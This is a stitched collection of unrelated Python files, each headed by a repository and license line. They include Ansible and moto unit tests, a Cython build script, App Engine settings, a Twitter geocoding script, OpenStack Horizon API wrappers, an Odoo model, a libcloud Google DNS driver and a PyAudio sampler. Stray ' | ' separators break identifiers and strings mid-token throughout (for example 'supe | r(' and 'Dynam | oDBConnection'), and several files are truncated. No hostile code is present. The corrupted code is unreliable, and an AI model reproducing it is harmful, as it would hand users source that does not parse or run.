def describe_reserved_instances_offerings(self):
raise NotImplementedError(
"ReservedInstances.describe_reserved_instances_offerings is not yet implemented"
)
def purchase_reserved_instances_offering(self):
if self.is_not_dryrun("PurchaseReservedInstances"):
raise NotImplementedError(
"ReservedInstances.purchase_reserved_instances_offering is not yet implemented"
)
|
alxgu/ansible | test/units/modules/network/onyx/test_onyx_config.py | Python | gpl-3.0 | 4,615 | 0.001517 | #
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from units.compat.mock import patch
from ansible.modules.network.onyx import onyx_config
from units.modules.utils import set_module_args
from .onyx_module import TestOnyxModule, load_fixture
class TestOnyxConfigModule(TestOnyxModule):
module = onyx_config
def setUp(self):
supe | r(TestOnyxConfigModule, self).setUp()
self.mock_get_co | nfig = patch('ansible.modules.network.onyx.onyx_config.get_config')
self.get_config = self.mock_get_config.start()
self.mock_load_config = patch('ansible.modules.network.onyx.onyx_config.load_config')
self.load_config = self.mock_load_config.start()
self.mock_run_commands = patch('ansible.modules.network.onyx.onyx_config.run_commands')
self.run_commands = self.mock_run_commands.start()
def tearDown(self):
super(TestOnyxConfigModule, self).tearDown()
self.mock_get_config.stop()
self.mock_load_config.stop()
self.mock_run_commands.stop()
def load_fixtures(self, commands=None, transport='cli'):
config_file = 'onyx_config_config.cfg'
self.get_config.return_value = load_fixture(config_file)
self.load_config.return_value = None
def test_onyx_config_unchanged(self):
src = load_fixture('onyx_config_config.cfg')
set_module_args(dict(src=src))
self.execute_module()
def test_onyx_config_src(self):
src = load_fixture('onyx_config_src.cfg')
set_module_args(dict(src=src))
commands = [
'interface mlag-port-channel 2']
self.execute_module(changed=True, commands=commands, is_updates=True)
def test_onyx_config_backup(self):
set_module_args(dict(backup=True))
result = self.execute_module()
self.assertIn('__backup__', result)
def test_onyx_config_save(self):
set_module_args(dict(lines=['hostname foo'], save='yes'))
self.execute_module(changed=True)
self.assertEqual(self.run_commands.call_count, 0)
self.assertEqual(self.get_config.call_count, 1)
self.assertEqual(self.load_config.call_count, 1)
args = self.load_config.call_args[0][1]
self.assertIn('configuration write', args)
def test_onyx_config_lines_wo_parents(self):
set_module_args(dict(lines=['hostname foo']))
commands = ['hostname foo']
self.execute_module(changed=True, commands=commands, is_updates=True)
def test_onyx_config_before(self):
set_module_args(dict(lines=['hostname foo'], before=['test1', 'test2']))
commands = ['test1', 'test2', 'hostname foo']
self.execute_module(changed=True, commands=commands, sort=False, is_updates=True)
def test_onyx_config_after(self):
set_module_args(dict(lines=['hostname foo'], after=['test1', 'test2']))
commands = ['hostname foo', 'test1', 'test2']
self.execute_module(changed=True, commands=commands, sort=False, is_updates=True)
def test_onyx_config_before_after(self):
set_module_args(dict(lines=['hostname foo'],
before=['test1', 'test2'],
after=['test3', 'test4']))
commands = ['test1', 'test2', 'hostname foo', 'test3', 'test4']
self.execute_module(changed=True, commands=commands, sort=False, is_updates=True)
def test_onyx_config_config(self):
config = 'hostname localhost'
set_module_args(dict(lines=['hostname router'], config=config))
commands = ['hostname router']
self.execute_module(changed=True, commands=commands, is_updates=True)
def test_onyx_config_match_none(self):
lines = ['hostname router']
set_module_args(dict(lines=lines, match='none'))
self.execute_module(changed=True, commands=lines, is_updates=True)
|
thdb-theo/Zombie-Survival | docs/assets/Tools/build_cython.py | Python | mit | 483 | 0 | from distutils.core import setup
from setuptools import Extension
from Cython.Build import cythonize
from Cython.Distutils | import build_ext
extensions = [
Extension("src.cython_.angle_between", ["src/cython_/angle_between.pyx"]),
Extension("src.cython_.collide", ["src/cython_/collide.pyx"]),
Extension("tests.experiment.testcy", ["tests/e | xperiment/testcy.pyx"])
]
setup(
ext_modules=cythonize(extensions),
cmdclass={"build_ext": build_ext},
)
|
jamesyin96/conference_central | settings.py | Python | apache-2.0 | 494 | 0.002024 | #!/usr/bin/env python
"""settings.py
U | dacity conference server-side Python App Engine app user settings
$Id$
created/forked from conference.py by wesc on 2014 may 24
"""
# Replace the following lines with client IDs obtained from the APIs
# Console or Cloud Console.
WEB_CLIENT_ID = '86908364842-sk7dtpvg5of9fr95pmgkndcg9r1t4osv.apps.googleusercontent.com'
ANDROID_CLIENT_ID = ' | replace with Android client ID'
IOS_CLIENT_ID = 'replace with iOS client ID'
ANDROID_AUDIENCE = WEB_CLIENT_ID
|
levisimons/CRASHLACMA | CRASHLACMA/twitter_json_parser.py | Python | cc0-1.0 | 2,983 | 0.041234 | #!/usr/bin/python
import json
from pprint import pprint
import re
import urllib
import time
from geopy import geocoders
import Image
import os
# TODO: handle test cases
# testcases:
# hollywood & vine, hollywood and vine
# order of operations: hashtag, img, address, other text.
# hashtag allcaps or lowercase
# uploaded image, link to hosted image
# multiple urls? currently hard-coded to only accept the first url seen. probably best this way.
class TwitterJsonParser(): |
# parser useful fields from file of json tweet objects
def get_data_from_tweets(self, input_data):
g = geocoders.GoogleV3()
tweet_data = []
processed_tweets = []
with open(input_data) as f:
for line in f:
if line.strip():
tweet_data = json.loads(line)
tweet = tweet_data["text"]
# scrub out any @mentions or #hashtags to leave behind address / text
tweet_text = ' '.join(re.sub("(@[A-Za-z0-9]+)|(#[A-Za-z0-9]+)|(\ | w+:\/\/\S+)"," ",tweet).split())
# geocode address to lat/long
address, (lat, lng) = g.geocode(tweet_text)
# TODO: this is a good place to validate the address for an LA coordinate.
# if not LA, toss in a bucket to be human-examined
# img uploaded via twitter
if tweet_data["entities"].get('media'):
print "DEBUG: img uploaded"
img_url = tweet_data["entities"]["media"][0]["media_url"]
# if img passed as url
else:
print "DEBUG: img as url"
img_url = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', tweet)[0]
print("tweet: %s") % tweet
print("tweet_text: %s, img_url: %s") % (tweet_text, img_url)
print("address: %s, lat: %s, lng: %s") % (address, lat, lng)
self.save_img_from_tweet(str(lat), str(lng), img_url)
processed_tweets.extend([address, str(lat), str(lng), img_url])
return processed_tweets
# this is run on one tweet at a time
def save_img_from_tweet(self, lat, lng, img_url):
DIR_FINISHED_IMGS = '../data_finished_images'
IMG_NAME = lat + '_' + lng + '_.PNG'
if (False == os.path.isfile(DIR_FINISHED_IMGS + '/' + IMG_NAME)):
# save url to disk with address as filename
try:
file = urllib.urlretrieve(img_url, DIR_FINISHED_IMGS + '/' + IMG_NAME)
print("Saved: %s" % DIR_FINISHED_IMGS + '/' + IMG_NAME)
except IOError, e:
print 'could not retrieve %s' % IMG_NAME
try:
im = Image.open(DIR_FINISHED_IMGS + '/' + IMG_NAME)
# TODO: need to figure out what thumbnail size looks best on projector
im2 = im.resize((40, 40), Image.NEAREST)
im2.save(DIR_FINISHED_IMGS + '/thumb_' + IMG_NAME)
except IOError, e:
print 'could not open resize and save %s' % IMG_NAME
time.sleep(1.5)
print("--------------------------------------------------------") # DEBUG
else:
print("file already exists. Skipping %s") % DIR_FINISHED_IMGS + '/' + IMG_NAME
return
return
|
im-auld/moto | tests/test_dynamodb2/test_dynamodb_table_without_range_key.py | Python | apache-2.0 | 14,869 | 0.000538 | from __future__ import unicode_literals
import boto
import boto3
from boto3.dynamodb.conditions import Key
import sure # noqa
from freezegun import freeze_time
from boto.exception import JSONResponseError
from moto import mock_dynamodb2
from tests.helpers import requires_boto_gte
try:
from boto.dynamodb2.fields import HashKey
from boto.dynamodb2.table import Table
from boto.dynamodb2.table import Item
from boto.dynamodb2.exceptions import ConditionalCheckFailedException, ItemNotFound
except ImportError:
pass
def create_table():
table = Table.create('messages', schema=[
HashKey('forum_name')
], throughput={
'read': 10,
'write': 10,
})
return table
@requires_boto_gte("2.9")
@mock_dynamodb2
@freeze_time("2012-01-14")
def test_create_table():
create_table()
expected = {
'Table': {
'AttributeDefinitions': [
{'AttributeName': 'forum_name', 'AttributeType': 'S'}
],
'ProvisionedThroughput': {
'NumberOfDecreasesToday': 0, 'WriteCapacityUnits': 10, 'ReadCapacityUnits': 10
},
'TableSizeBytes': 0,
'TableName': 'messages',
'TableStatus': 'ACTIVE',
'KeySchema': [
{'KeyType': 'HASH', 'AttributeName': 'forum_name'}
],
'ItemCount': 0, 'CreationDateTime': 1326499200.0,
'GlobalSecondaryIndexes': [],
'LocalSecondaryIndexes': []
}
}
conn = boto.dynamodb2.connect_to_region(
'us-west-2',
aws_access_key_id="ak",
aws_secret_access_key="sk"
)
conn.describe_table('messages').should.equal(expected)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_delete_table():
create_table()
conn = boto.dynamodb2.layer1.DynamoDBConnection()
conn.list_tables()["TableNames"].should.have.length_of(1)
conn.delete_table('messages')
conn.list_tables()["TableNames"].should.have.length_of(0)
conn.delete_table.when.called_with('messages').should.throw(JSONResponseError)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_update_table_throughput():
table = create_table()
table.throughput["read"].should.equal(10)
table.throughput["write"].should.equal(10)
table.update(throughput={
'read': 5,
'write': 6,
})
table.throughput["read"].should.equal(5)
table.throughput["write"].should.equal(6)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_item_add_and_describe_and_update():
table = create_table()
data = {
'forum_name': 'LOLCat Forum',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User A',
}
table.put_item(data=data)
returned_item = table.get_item(forum_name="LOLCat Forum")
returned_item.should_not.be.none
dict(returned_item).should.equal({
'forum_name': 'LOLCat Forum',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User A',
})
returned_item['SentBy'] = 'User B'
returned_item.save(overwrite=True)
returned_item = table.get_item(
forum_name='LOLCat Forum'
)
dict(returned_item).should.equal({
'forum_name': 'LOLCat Forum',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User B',
})
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_item_partial_save():
table = create_table()
data = {
'forum_name': 'LOLCat Forum',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User A',
}
table.put_item(data=data)
returned_item = table.get_item(forum_name="LOLCat Forum")
returned_item['SentBy'] = 'User B'
returned_item.partial_save()
returned_item = table.get_item(
forum_name='LOLCat Forum'
)
dict(returned_item).should.equal({
'forum_name': 'LOLCat Forum',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User B',
})
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_item_put_without_table():
conn = boto.dynamodb2.layer1.DynamoDBConnection()
conn.put_item.when.called_with(
table_name='undeclared-table',
item={
'forum_name': 'LOLCat Forum',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User A',
}
).should.throw(JSONResponseError)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_get_item_with_undeclared_table():
conn = boto.dynamodb2.layer1.DynamoDBConnection()
conn.get_item.when.called_with(
table_name='undeclared-table',
key={"forum_name": {"S": "LOLCat Forum"}},
).should.throw(JSONResponseError)
@requires_boto_gte("2.30.0")
@mock_dynamodb2
def test_delete_item():
table = create_table()
item_data = {
'forum_name': 'LOLCat Forum',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User A',
'ReceivedTime': '12/9/2011 11:36:03 PM',
}
item = Item(table, item_data)
item.save()
table.count().should.equal(1)
response = item.delete()
response.should.equal(True)
table.count().should.equal(0)
item.delete().should.equal(False)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_delete_item_with_undeclared_table():
conn = boto.dynamodb2.layer1.Dynam | oDBConnection()
conn.delete_item.when.called_with(
| table_name='undeclared-table',
key={"forum_name": {"S": "LOLCat Forum"}},
).should.throw(JSONResponseError)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_query():
table = create_table()
item_data = {
'forum_name': 'the-key',
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User A',
'ReceivedTime': '12/9/2011 11:36:03 PM',
}
item = Item(table, item_data)
item.save(overwrite=True)
table.count().should.equal(1)
table = Table("messages")
results = table.query(forum_name__eq='the-key')
sum(1 for _ in results).should.equal(1)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_query_with_undeclared_table():
conn = boto.dynamodb2.layer1.DynamoDBConnection()
conn.query.when.called_with(
table_name='undeclared-table',
key_conditions={"forum_name": {"ComparisonOperator": "EQ", "AttributeValueList": [{"S": "the-key"}]}}
).should.throw(JSONResponseError)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_scan():
table = create_table()
item_data = {
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User A',
'ReceivedTime': '12/9/2011 11:36:03 PM',
}
item_data['forum_name'] = 'the-key'
item = Item(table, item_data)
item.save()
item['forum_name'] = 'the-key2'
item.save(overwrite=True)
item_data = {
'Body': 'http://url_to_lolcat.gif',
'SentBy': 'User B',
'ReceivedTime': '12/9/2011 11:36:03 PM',
'Ids': set([1, 2, 3]),
'PK': 7,
}
item_data['forum_name'] = 'the-key3'
item = Item(table, item_data)
item.save()
results = table.scan()
sum(1 for _ in results).should.equal(3)
results = table.scan(SentBy__eq='User B')
sum(1 for _ in results).should.equal(1)
results = table.scan(Body__beginswith='http')
sum(1 for _ in results).should.equal(3)
results = table.scan(Ids__null=False)
sum(1 for _ in results).should.equal(1)
results = table.scan(Ids__null=True)
sum(1 for _ in results).should.equal(2)
results = table.scan(PK__between=[8, 9])
sum(1 for _ in results).should.equal(0)
results = table.scan(PK__between=[5, 8])
sum(1 for _ in results).should.equal(1)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_scan_with_undeclared_table():
conn = boto.dynamodb2.layer1.DynamoDBConnection()
conn.scan.when.called_with(
table_name='undeclared-table',
scan_filter={
"SentBy": {
"AttributeValueList": [{
"S": "User B"}
],
"ComparisonOperator": "EQ"
}
},
).should.throw(JSONResponseError)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_write_batch():
table = create_table()
with table.batch_write( |
Daniex/horizon | openstack_dashboard/api/base.py | Python | apache-2.0 | 12,076 | 0.000083 | # Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from collections import Sequence # noqa
import logging
from django.conf import settings
from horizon import exceptions
import six
__all__ = ('APIResourceWrapper', 'APIDictWrapper',
'get_service_from_catalog', 'url_for',)
LOG = logging.getLogger(__name__)
class APIVersionManager(object):
"""Object to store and manage API versioning data and utility methods."""
SETTINGS_KEY = "OPENSTACK_API_VERSIONS"
def __init__(self, service_type, preferred_version=None):
self.service_type = service_type
self.preferred = preferred_version
self._active = None
self.supported = {}
# As a convenience, we can drop in a placeholder for APIs that we
# have not yet needed to version. This is useful, for example, when
# panels such as the admin metadata_defs wants to check the active
# version even though it's not explicitly defined. Previously
# this caused a KeyError.
if self.preferred:
self.supported[self.preferred] = {"version": self.preferred}
@property
def active(self):
if self._active is None:
self.get_active_version()
return self._active
def load_supported_version(self, version, data):
self.supported[version] = data
def get_active_version(self):
if self._active is not None:
return self.supported[self._active]
key = getattr(settings, self.SETTINGS_KEY, {}).get(self.service_type)
if key is None:
# TODO(gabriel): support API version discovery here; we'll leave
# the setting in as a way of overriding the latest available
# version.
key = self.preferred
# Since we do a key lookup in the supported dict the type matters,
# let's ensure people know if they use a string when the key isn't.
if isinstance(key, six.string_types):
msg = ('The version "%s" specified for the %s service should be '
'either an integer or a float, not a string.' %
(key, self.service_type))
raise exceptions.ConfigurationError(msg)
# Provide a helpful error message if the specified version isn't in the
# supported list.
if key not in self.supported:
choices = ", ".join(str(k) for k in six.iterkeys(self.supported))
msg = ('%s is not a supported API version for the %s service, '
' choices are: %s' % (key, self.service_type, choices))
raise exceptions.ConfigurationError(msg)
self._active = key
return self.supported[self._active]
def clear_active_cache(self):
self._active = None
class APIResourceWrapper(object):
"""Simple wrapper for api objects.
Define _attrs on the child class and pass in the
api object as the only argument to the constructor
"""
_attrs = []
_apiresource = None # Make sure _apiresource is there even in __init__.
def __init__(self, apiresource):
self._apiresource = apiresource
def __getattribute__(self, attr):
try:
return object.__getattribute__(self, attr)
except AttributeError:
if attr not in self._attrs:
raise
# __getattr__ won't find properties
return getattr(self._apiresource, attr)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__,
dict((attr, getattr(self, attr))
for attr in self._attrs
if hasattr(self, attr)))
def to_dict(self):
obj = {}
for key in self._attrs:
obj[key] = getattr(self._apiresource, key, None)
return obj
class APIDictWrapper(object):
"""Simple wrapper for api dictionaries
Some api calls return dictionaries. This class provides identical
behavior as APIResourceWrapper, except that it will also behave as a
dictionary, in addition to attribute accesses.
Attribute access is the preferred method of access, to be
consistent with api resource objects from novaclient.
"""
_apidict = {} # Make sure _apidict is there even in __init__.
def __init__(self, apidict):
self._apidict = apidict
def __getattribute__(self, attr):
try:
return object.__getattribute__(self, attr)
except AttributeError:
if attr not in self._apidict:
raise
return self._apidict[attr]
def __getitem__(self, item):
try:
return getattr(self, item)
except (AttributeError, TypeError) as e:
# caller is expecting a KeyError
raise KeyError(e)
def __contains__(self, item):
try:
return hasattr(self, item)
except TypeError:
return False
def get(self, item, default=None):
try:
return getattr(self, item)
except (AttributeError, TypeError):
return default
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, self._apidict)
def to_dict(self):
return self._apidict
class Quota(object):
"""Wrapper for individual limits in a quota."""
def __init__(self, name, limit):
self.name = name
self.limit = limit
def __repr__(self):
return "<Quota: (%s, %s)>" % (self.name, self.limit)
class QuotaSet(Sequence):
"""Wrapper for client QuotaSet objects which turns the individual quotas
into Quota objects for easier handling/iteration.
`QuotaSet` objects support a mix of `list` and `dict` methods; you can use
the bracket notation (`qs["my_quota"] = 0`) to add new quota values, and
use the `get` method to retrieve a specific quota, but otherwise it
behaves much like a list or tuple, particularly in supporting iteration.
"""
def __init__(self, apiresource=None):
self.items = []
if apiresource:
if hasattr(apiresource, '_info'):
items = apiresource._info.items()
else:
items = apiresource.items()
for k, v in items:
if k == 'id':
continue
self[k] = v
def __setitem__(self, k, v):
v = int(v) if v is not None else v
q = Quota(k, v)
self.items.append(q)
def __getitem__(self, index):
return self.items[index]
def __add__(s | elf, other):
"""Merge another QuotaSet into this one. Existing quotas are
not overridden.
"""
if not isinstance(other, QuotaSet):
msg = "Can only add QuotaSet to Qu | otaSet, " \
"but received %s instead" % type(other)
raise ValueError(msg)
for item in other:
if self.get(item.name).limit is None:
self.items.append(item)
return self
def __len__(self):
return len(self.items)
def __repr__(self):
return repr(self.items)
def get(self, key, default=None):
match = [quota for quota in self.items if quota.name == key]
return match.pop() if len(match) else Quota(key, default)
def add(self, other):
return self.__add__(other)
def get_service_from_catalog(catalog, service_type):
if catalog:
|
eicher31/compassion-modules | mobile_app_connector/models/privacy_statement.py | Python | agpl-3.0 | 950 | 0 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2019 Compassion CH (http://www.compassion.ch)
# @author: Emanuel Cino <ecino@compassion.ch>
# @author: Théo Nikles <theo.nikles@gmail.com>
#
# The licence is in the file __manifest__.py
#
##############################################################################
from ..controllers.mobile_app_controller import _get_lang
from odoo import models, fields
class PrivacyStatementAgreement(models.Model):
_inherit = 'privacy.statement.agreement'
origin_signature = fields.Selection(
selection_add=[('mobile_app', 'Mobile App Registration')])
def mobile_get_privacy_notice(self, **params | ):
lang = _get_lang(self, params)
return {'PrivacyNotice': self.env['compassion.privacy.statement']
| .with_context(lang=lang)
.sudo().search([], limit=1).text}
|
Hybrid-Cloud/badam | patches_tool/aws_patch/aws_deps/libcloud/dns/drivers/google.py | Python | apache-2.0 | 11,423 | 0.000525 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = [
'GoogleDNSDriver'
]
# API docs: https://cloud.google.com/dns/api/v1beta1
API_VERSION = 'v1beta1'
import re
from libcloud.common.google import GoogleResponse, GoogleBaseConnection
from libcloud.common.google import ResourceNotFoundError
from libcloud.dns.types import Provider, RecordType
from libcloud.dns.types import ZoneDoesNotExistError, RecordDoesNotExistError
from libcloud.dns.base import DNSDriver, Zone, Record
class GoogleDNSResponse(GoogleResponse):
pass
class GoogleDNSConnection(GoogleBaseConnection):
host = "www.googleapis.com"
responseCls = GoogleDNSResponse
def __init__(self, user_id, key, secure, auth_type=None,
credential_file=None, project=None, **kwargs):
super(GoogleDNSConnection, self).\
__init__(user_id, key, secure=secure, auth_type=auth_type,
credential_file=credential_file, **kwargs)
self.request_path = '/dns/%s/projects/%s' % (API_VERSION, project)
class GoogleDNSDriver(DNSDriver):
type = Provider.GOOGLE
name = 'Google DNS'
connectionCls = GoogleDNSConnection
website = 'https://cloud.google.com/'
RECORD_TYPE_MAP = {
RecordType.A: 'A',
RecordType.AAAA: 'AAAA',
RecordType.CNAME: 'CNAME',
RecordType.MX: 'MX',
RecordType.NS: 'NS',
RecordType.PTR: 'PTR',
RecordType.SOA: 'SOA',
RecordType.SPF: 'SPF',
RecordType.SRV: 'SRV',
RecordType.TXT: 'TXT',
}
def __init__(self, user_id, key, project=None, auth_type=None, scopes=None,
**kwargs):
self.auth_type = auth_type
self.project = project
self.scopes = scopes
if not self.project:
raise ValueError('Project name must be specified using '
'"project" keyword.')
super(GoogleDNSDriver, self).__init__(user_id, key, **kwargs)
def iterate_zones(self):
"""
Return a generator to iterate over available zones.
:rtype: ``generator`` of :class:`Zone`
"""
return self._get_more('zones')
def iterate_records(self, zone):
"""
Return a generator to iterate over records for the provided zone.
:param zone: Zone to list records for.
:type zone: :class:`Zone`
:rtype: ``generator`` of :class:`Record`
"""
return self._get_more('records', zone=zone)
def get_zone(self, zone_id):
"""
Return a Zone instance.
:param zone_id: ID of the required zone
:type zone_id: ``str``
:rtype: :class:`Zone`
"""
request = '/managedZones/%s' % (zone_id)
try:
response = self.connection.request(request, method='GET').object
except ResourceNotFoundError:
raise ZoneDoesNotExistError(value='',
driver=self.connection.driver,
zone_id=zone_id)
return self._to_zone(response)
def get_r | ecord(self, zone_id, record_id):
"""
|
Return a Record instance.
:param zone_id: ID of the required zone
:type zone_id: ``str``
:param record_id: ID of the required record
:type record_id: ``str``
:rtype: :class:`Record`
"""
(record_type, record_name) = record_id.split(':', 1)
params = {
'name': record_name,
'type': record_type,
}
request = '/managedZones/%s/rrsets' % (zone_id)
try:
response = self.connection.request(request, method='GET',
params=params).object
except ResourceNotFoundError:
raise ZoneDoesNotExistError(value='',
driver=self.connection.driver,
zone_id=zone_id)
if len(response['rrsets']) > 0:
zone = self.get_zone(zone_id)
return self._to_record(response['rrsets'][0], zone)
raise RecordDoesNotExistError(value='', driver=self.connection.driver,
record_id=record_id)
def create_zone(self, domain, type='master', ttl=None, extra=None):
"""
Create a new zone.
:param domain: Zone domain name (e.g. example.com.) with a \'.\'
at the end.
:type domain: ``str``
:param type: Zone type (master is the only one supported).
:type type: ``str``
:param ttl: TTL for new records. (unused)
:type ttl: ``int``
:param extra: Extra attributes (driver specific). (optional)
:type extra: ``dict``
:rtype: :class:`Zone`
"""
name = None
description = ''
if extra:
description = extra.get('description')
name = extra.get('name')
if name is None:
name = self._cleanup_domain(domain)
data = {
'dnsName': domain,
'name': name,
'description': description,
}
request = '/managedZones'
response = self.connection.request(request, method='POST',
data=data).object
return self._to_zone(response)
def create_record(self, name, zone, type, data, extra=None):
"""
Create a new record.
:param name: Record name fully qualified, with a \'.\' at the end.
:type name: ``str``
:param zone: Zone where the requested record is created.
:type zone: :class:`Zone`
:param type: DNS record type (A, AAAA, ...).
:type type: :class:`RecordType`
:param data: Data for the record (depends on the record type).
:type data: ``str``
:param extra: Extra attributes. (optional)
:type extra: ``dict``
:rtype: :class:`Record`
"""
ttl = data.get('ttl', 0)
rrdatas = data.get('rrdatas', [])
data = {
'additions': [
{
'name': name,
'type': type,
'ttl': int(ttl),
'rrdatas': rrdatas,
}
]
}
request = '/managedZones/%s/changes' % (zone.id)
response = self.connection.request(request, method='POST',
data=data).object
return self._to_record(response['additions'][0], zone)
def delete_zone(self, zone):
"""
Delete a zone.
Note: This will delete all the records belonging to this zone.
:param zone: Zone to delete.
:type zone: :class:`Zone`
:rtype: ``bool``
"""
request = '/managedZones/%s' % (zone.id)
response = self.connection.request(request, method='DELETE')
return response.success()
def delete_record(self, record):
"""
Delete a record.
:param record: Record to delete.
:type record: :class:`Record`
:rtype: ``bool``
"""
|
cornell-cup/cs-minibot-platform | python-interface/src/MiniBotFramework/Sound/live_audio_sample.py | Python | apache-2.0 | 3,940 | 0.038071 | import numpy as np
import matplotlib.pyplot as plt #Used for graphing audio tests
import pyaudio as pa
import wave
from time import sleep
#Constants used for sampling audio
CHUNK = 1024
FORMAT = pa.paInt16
CHANNELS = 1
RATE = 44100 # Must match rate at which mic actually samples sound
RECORD_TIMEFRAME = 1.0 #Time in seconds
OUTPUT_FILE = "sample.wav"
#Flag for plotting sound input waves for debugging and implementation purposes
TESTING_GRAPHS = True
def sampleAudio(wav_name=OUTPUT_FILE):
"""Samples audio from the microphone for a given period of time.
The output file is saved as [wav_name]
Code here taken from the front page of:
< https://people.csail.mit.edu/hubert/pyaudio/ > """
# Open the recording session
rec_session | = pa.PyAudio()
stream = rec_session.open(format=FORMAT,
channels=CHANNELS,rate=RATE,input=True,frames_per | _buffer=CHUNK)
print("Start recording")
frames = []
# Sample audio frames for given time period
for i in range(0, int(RATE/CHUNK*RECORD_TIMEFRAME)):
data = stream.read(CHUNK)
frames.append(data)
# Close the recording session
stream.stop_stream()
stream.close()
rec_session.terminate()
#Create the wav file for analysis
output_wav = wave.open(wav_name,"wb")
output_wav.setnchannels(CHANNELS)
output_wav.setsampwidth(rec_session.get_sample_size(FORMAT))
output_wav.setframerate(RATE)
output_wav.writeframes(b''.join(frames))
output_wav.close()
def getAvgFreq(wav_file=OUTPUT_FILE):
    """Analyzes the audio sample [wav_file] (must be a 16-bit WAV file with
    one channel) and returns maximum magnitude of the most prominent sound
    and the frequency thresholds it falls between.

    Returns a (magnitude, lower_thres, upper_thres) tuple.

    Basic procedure of processing audio taken from:
    < http://samcarcagno.altervista.org/blog/basic-sound-processing-python/ >"""
    #Open wav file for analysis
    sound_sample = wave.open(wav_file, "rb")
    #Get sampling frequency
    sample_freq = sound_sample.getframerate()
    #Extract audio frames to be analyzed (only the first 1024 frames are read)
    # audio_frames = sound_sample.readframes(sound_sample.getnframes())
    audio_frames = sound_sample.readframes(1024)
    converted_val = []
    # Convert little-endian 16-bit sample pairs into signed integers, one per
    # frame. NOTE(review): ord() on an indexed frame buffer assumes Python 2
    # (str) semantics -- under Python 3, indexing bytes already yields an int.
    for i in range(0,len(audio_frames),2):
        if ord(audio_frames[i+1])>127:
            # High byte > 127 means the sample is negative (two's complement).
            converted_val.append(-(ord(audio_frames[i])+(256*(255-ord(audio_frames[i+1])))))
        else:
            converted_val.append(ord(audio_frames[i])+(256*ord(audio_frames[i+1])))
    #Fit into numpy array for FFT analysis
    freq_per_frame = np.array(converted_val)
    # Get amplitude (power spectrum) of the soundwave section
    freq = np.fft.fft(freq_per_frame)
    amplitude = np.abs(freq)
    amplitude = amplitude/float(len(freq_per_frame))
    amplitude = amplitude**2
    #Get bins/thresholds for frequencies
    freqbins = np.fft.fftfreq(CHUNK,1.0/sample_freq)
    x = np.linspace(0.0,1.0,1024)  # currently unused
    # Plot data if need visualization (debug aid gated by TESTING_GRAPHS)
    if(TESTING_GRAPHS):
        #Plot raw data
        plt.plot(converted_val)
        plt.title("Raw Data")
        plt.xlabel("Time (ms)")
        plt.ylabel("Frequency (Hz)")
        plt.show()
        #Plot frequency histogram
        plt.plot(freqbins[:16],amplitude[:16])
        plt.title("Processed Data")
        plt.xlabel("Frequency Bins")
        plt.ylabel("Magnitude")
        plt.show()
    #Get the range that the max amplitude falls in. This represents the loudest noise
    magnitude = np.amax(amplitude)
    loudest = np.argmax(amplitude)
    lower_thres = freqbins[loudest]
    upper_thres = (freqbins[1]-freqbins[0])+lower_thres
    #Close wav file
    sound_sample.close()
    #Return the magnitude of the sound wave and its frequency threshold for analysis
    return magnitude, lower_thres, upper_thres
#Use for testing microphone input: records RECORD_TIMEFRAME seconds from the
#default mic, then reports the loudest frequency bin of the captured sample.
if __name__ == "__main__":
    # print("Wait 3 seconds to start...")
    # sleep(3)
    print("Recording!")
    sampleAudio(OUTPUT_FILE)
    print("Stop recording!")
    print("Analyzing...")
    mag, lower, upper = getAvgFreq(OUTPUT_FILE)
    print("Magnitude is "+str(mag))
    print("Lower bin threshold is "+str(lower))
    print("Upper bin threshold is "+str(upper))
|
